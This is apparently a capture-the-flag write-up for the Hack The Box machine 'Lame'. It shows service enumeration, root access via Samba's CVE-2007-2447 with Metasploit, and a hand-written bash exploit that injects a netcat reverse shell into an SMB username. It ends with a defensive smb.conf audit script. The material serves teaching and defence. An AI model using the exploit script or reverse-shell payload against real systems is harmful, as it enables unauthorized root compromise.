Lame

Initial Enumeration

Nmap

┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.3                   
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-20 01:51 EDT
Nmap scan report for 10.10.10.3
Host is up (0.16s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 9.79 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.3 -sV -p21,22,139,445
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-20 02:13 EDT
Nmap scan report for 10.10.10.3
Host is up (0.16s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 11.85 seconds

The nmap scan shows three services exposed: FTP on 21 (vsftpd 2.3.4), SSH on 22 (OpenSSH 4.7p1) and SMB on 139/445 (Samba, reported only as 3.X - 4.X by service detection). All three banners are old, so the next step is to enumerate each service for anonymous access and for a precise version string.

FTP

┌──(kali㉿kali)-[~]
└─$ ftp 10.10.10.3                                                                     
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||14938|).
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
229 Entering Extended Passive Mode (|||39524|).
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.

Connecting to FTP, we note that anonymous login is accepted. The directory listing itself works, but the share is empty (only . and .. are present), so there is nothing to pull from here.

SMB

┌──(kali㉿kali)-[~]
└─$ smbclient -N //10.10.10.3/tmp 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \\> ls
  .                                   D        0  Sun Oct 20 01:55:13 2024
  ..                                 DR        0  Sat Oct 31 02:33:58 2020
  5569.jsvc_up                        R        0  Sun Oct 20 01:50:13 2024
  .ICE-unix                          DH        0  Sun Oct 20 01:49:11 2024
  vmware-root                        DR        0  Sun Oct 20 01:49:14 2024
  .X11-unix                          DH        0  Sun Oct 20 01:49:37 2024
  .X0-lock                           HR       11  Sun Oct 20 01:49:37 2024
  vgauthsvclog.txt.0                  R     1600  Sun Oct 20 01:49:09 2024

                7282168 blocks of size 1024. 5386560 blocks available
smb: \\> ls -la
NT_STATUS_NO_SUCH_FILE listing \\-la
smb: \\> get vgauthsvclog.txt.0 
getting file \\vgauthsvclog.txt.0 of size 1600 as vgauthsvclog.txt.0 (2.4 KiloBytes/sec) (average 2.4 KiloBytes/sec)
smb: \\> get vmware-root
NT_STATUS_ACCESS_DENIED opening remote file \\vmware-root
smb: \\> cd vmware-root\\
smb: \\vmware-root\\> ls
NT_STATUS_ACCESS_DENIED listing \\vmware-root\\*
smb: \\vmware-root\\> cd ..
smb: \\> get 5569.jsvc_up 
NT_STATUS_ACCESS_DENIED opening remote file \\5569.jsvc_up
smb: \\> get .X0-lock 
getting file \\.X0-lock of size 11 as .X0-lock (0.0 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \\> exit

┌──(kali㉿kali)-[~]
└─$ rpcclient -U "" 10.10.10.3                              
Password for [WORKGROUP\\]:
rpcclient $> querydominfo
Domain:         WORKGROUP
Server:         LAME
Comment:        lame server (Samba 3.0.20-Debian)
Total Users:    35
Total Groups:   0
Total Aliases:  0
Sequence No:    1729405047
Force Logoff:   -1
Domain Server State:    0x1
Server Role:    ROLE_DOMAIN_PDC
Unknown 3:      0x1
                               

We then move on to SMB. The tmp share accepts a null session (smbclient -N) and lists a handful of files; note that smbclient's ls takes a filename mask rather than flags, which is why "ls -la" fails with NT_STATUS_NO_SUCH_FILE. Only two of the files are readable (vgauthsvclog.txt.0 and .X0-lock); the rest are owned by other users and return NT_STATUS_ACCESS_DENIED. Neither readable file contains anything useful, as shown below. The important finding comes from rpcclient: the server comment reveals the exact version, Samba 3.0.20-Debian, which nmap's banner grab could only narrow down to 3.X - 4.X.

┌──(kali㉿kali)-[~]
└─$ cat vgauthsvclog.txt.0                  
[Oct 20 01:49:09.529] [ message] [VGAuthService] VGAuthService 'build-4448496' logging at level 'normal'
[Oct 20 01:49:09.529] [ message] [VGAuthService] Pref_LogAllEntries: 1 preference groups in file '/etc/vmware-tools/vgauth.conf'
[Oct 20 01:49:09.529] [ message] [VGAuthService] Group 'service'
[Oct 20 01:49:09.529] [ message] [VGAuthService]         samlSchemaDir=/usr/lib/vmware-vgauth/schemas
[Oct 20 01:49:09.529] [ message] [VGAuthService] Pref_LogAllEntries: End of preferences
[Oct 20 01:49:09.569] [ message] [VGAuthService] VGAuthService 'build-4448496' logging at level 'normal'
[Oct 20 01:49:09.569] [ message] [VGAuthService] Pref_LogAllEntries: 1 preference groups in file '/etc/vmware-tools/vgauth.conf'
[Oct 20 01:49:09.569] [ message] [VGAuthService] Group 'service'
[Oct 20 01:49:09.569] [ message] [VGAuthService]         samlSchemaDir=/usr/lib/vmware-vgauth/schemas
[Oct 20 01:49:09.569] [ message] [VGAuthService] Pref_LogAllEntries: End of preferences
[Oct 20 01:49:09.569] [ message] [VGAuthService] Cannot load message catalog for domain 'VGAuthService', language 'C', catalog dir '.'.
[Oct 20 01:49:09.569] [ message] [VGAuthService] INIT SERVICE
[Oct 20 01:49:09.569] [ message] [VGAuthService] Using '/var/lib/vmware/VGAuth/aliasStore' for alias store root directory
[Oct 20 01:49:09.641] [ message] [VGAuthService] SAMLCreateAndPopulateGrammarPool: Using '/usr/lib/vmware-vgauth/schemas' for SAML schemas
[Oct 20 01:49:09.687] [ message] [VGAuthService] SAML_Init: Allowing 300 of clock skew for SAML date validation
[Oct 20 01:49:09.688] [ message] [VGAuthService] BEGIN SERVICE

┌──(kali㉿kali)-[~]
└─$ cat .X0-lock 
      5631

Initial Foothold

With the exact Samba version in hand, we can search Metasploit for exploits matching it.

┌──(kali㉿kali)-[~]
└─$ msfconsole
Metasploit tip: When in a module, use back to go back to the top level 
prompt
                                                  
               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,                                                                                                 
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,                                                                                              
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:                                                                                            
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,                                                                                          
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo                                                                                         
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk                                                                                        
 oMMMMMMMMMMx.                    dMMMMMMMMMMx                                                                                       
.WMMMMMMMMM:                       :MMMMMMMMMM,                                                                                      
xMMMMMMMMMo                         lMMMMMMMMMO                                                                                      
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;                                                                               
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:                                                                                
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:                                                                                  
xMMMMMMMMMd                        ,0MMMMMMMMMMK;                                                                                    
.WMMMMMMMMMc                         'OMMMMMM0,                                                                                      
 lMMMMMMMMMMk.                         .kMMO'                                                                                        
  dMMMMMMMMMMWd'                         ..                                                                                          
   cWMMMMMMMMMMMNxc'.                ##########                                                                                      
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:                                
                                :::::::+:
                      Metasploit

       =[ metasploit v6.4.18-dev                          ]
+ -- --=[ 2437 exploits - 1255 auxiliary - 429 post       ]
+ -- --=[ 1471 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: <https://docs.metasploit.com/>

msf6 > search samba 3.0.20

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

The single match is exploit/multi/samba/usermap_script, the module for CVE-2007-2447. Samba 3.0.20 through 3.0.25rc3 pass the username from a session setup request to the configured "username map script" via /bin/sh without escaping it, so a username containing backticks executes the enclosed command on the server. No valid credentials are needed, because the mapping runs before the password is checked, and because smbd runs as root the injected command runs as root as well. Two caveats: the bug is only reachable when "username map script" is actually set in smb.conf, which nothing in the scan can confirm, and the module has no check method (Check: No), so running it is the test. We proceed to use it.
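The same injection can be driven by hand with smbclient, which makes the mechanism clearer than the Metasploit run does. The script below is an added example written for this page, not code from the original post or from the Metasploit module; RHOST, LHOST and LPORT default to the addresses used in this writeup, the tmp share is the one browsed anonymously above, and the `--option` is an assumption that only matters when the client's default minimum protocol refuses SMB1 (all that Samba 3.0.20 speaks).

```bash
#!/bin/bash
# Added example, not code from the original post or from the Metasploit module:
# reproduce the "username map script" injection (CVE-2007-2447) by hand with
# smbclient. Assumed values: RHOST/LHOST/LPORT default to the addresses used in
# the writeup; the tmp share is the one browsed anonymously above.

RHOST="${RHOST:-10.10.10.3}"
LHOST="${LHOST:-10.10.14.3}"
LPORT="${LPORT:-4444}"

# Samba 3.0.20 to 3.0.25rc3 hand the session-setup username to the configured
# "username map script" through /bin/sh without escaping it, so backticks in
# the username execute the enclosed command. The "/=" prefix and nohup mirror
# what exploit/multi/samba/usermap_script sends; nohup keeps the command alive
# after smbd gives up on the (deliberately failing) logon.
build_username() {
    printf '/=`nohup %s`' "$1"
}

# The payload the Metasploit session used on our behalf: a netcat reverse
# shell. This assumes the target's nc supports -e (old netcat-traditional
# does); the command runs as root because smbd runs as root.
reverse_shell_cmd() {
    printf 'nc -e /bin/sh %s %s' "$LHOST" "$LPORT"
}

# Connect anonymously, then issue a second session setup with the crafted
# username via smbclient's "logon" command. The mapping script runs before
# the password is checked, so the logon itself is expected to fail; the shell
# arrives on the listener regardless.
trigger() {
    local user="$1"
    smbclient -N "//$RHOST/tmp" --option='client min protocol=NT1' \
        -c "logon \"$user\" \"\""
}

payload_user="$(build_username "$(reverse_shell_cmd)")"
echo "1) start a listener first: nc -lvnp $LPORT"
echo "2) username that will be sent: $payload_user"
# Fire only when explicitly asked, so the script is safe to source or lint.
if [ "${FIRE:-0}" = "1" ]; then
    trigger "$payload_user"
fi
```

Run it as `FIRE=1 ./usermap.sh` with `nc -lvnp 4444` already listening. The logon reports a failure; that is expected, because the command has already run by the time smbd rejects the empty password.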

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > options

Module options (exploit/multi/samba/usermap_script):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see <https://docs.metasploit.com/docs/using-metasploit/basics/using-metas>
                                       ploit.html
   RPORT    139              yes       The target port (TCP)

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.106.130  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.

msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3                                                                                                                 
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.3
LHOST => 10.10.14.3                                                                                                                  
msf6 exploit(multi/samba/usermap_script) > run                                                                                       
                                                                                                                                     
[*] Started reverse TCP handler on 10.10.14.3:4444                                                                                   
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.3:43272) at 2024-10-20 02:18:12 -0400                                
                                                                                                                                                                                                                                                                  
whoami                                                                                                                               
root                                                                                                                                 

cd root 
cat root.txt
2e3068557394c4b1e66c2243b0841e7a

cd ..
cd makis
ls
user.txt
cat user.txt
cdb4360bc8deac01ceffeddddda70bc1
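From the defender's side, the precondition for this whole chain is a single smb.conf directive. The audit function below is an added example written for this page, not code from the original post or from the Samba project; it reads a Samba config, skips comments (both `#` and `;`), normalises parameter names the way Samba does (case and whitespace insensitive) and reports every effective "username map script" setting with its section. The sample smb.conf is constructed here for the demonstration and is not taken from the target.

```bash
#!/bin/bash
# Added example, not code from the original post or from Samba: audit an
# smb.conf for the "username map script" directive that CVE-2007-2447 abuses.
# The sample config at the bottom is constructed for this demonstration.

# Prints "section<TAB>script" for each effective occurrence of the directive.
# Returns 0 if at least one was found, 1 otherwise.
find_username_map_script() {
    local conf="$1" section="" found=1 line key value
    while IFS= read -r line || [ -n "$line" ]; do
        # strip leading whitespace
        line="${line#"${line%%[![:space:]]*}"}"
        case "$line" in
            ''|'#'*|';'*) continue ;;                              # blank or comment
            '['*) section="${line#\[}"; section="${section%%]*}"; continue ;;
            *=*) ;;                                                # key = value
            *) continue ;;
        esac
        key="${line%%=*}"
        value="${line#*=}"
        # Samba ignores case and whitespace in parameter names, so
        # "User Name Map Script" and "usernamemapscript" are the same key.
        key="$(printf '%s' "$key" | tr -d '[:space:]' | tr '[:upper:]' '[:lower:]')"
        value="${value#"${value%%[![:space:]]*}"}"
        if [ "$key" = "usernamemapscript" ]; then
            printf '%s\t%s\n' "$section" "$value"
            found=0
        fi
    done < "$conf"
    return "$found"
}

# Constructed sample: a commented-out copy that must be ignored and a live
# one in [global] that must be reported.
SAMPLE_CONF="$(mktemp)"
cat > "$SAMPLE_CONF" <<'EOF'
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba %v)
;  username map script = /disabled/by/comment.sh
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
   writable = yes
   guest ok = yes
EOF

if hits="$(find_username_map_script "$SAMPLE_CONF")"; then
    printf 'username map script is set (section\tscript):\n%s\n' "$hits"
    echo "on Samba 3.0.20 to 3.0.25rc3 this is CVE-2007-2447: remove the directive or upgrade"
else
    echo "username map script is not set"
fi
```

For a real host, run it over the effective configuration rather than the raw file, since smb.conf can pull in other files with include: `testparm -s /etc/samba/smb.conf 2>/dev/null > effective.conf` and then `find_username_map_script effective.conf`.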
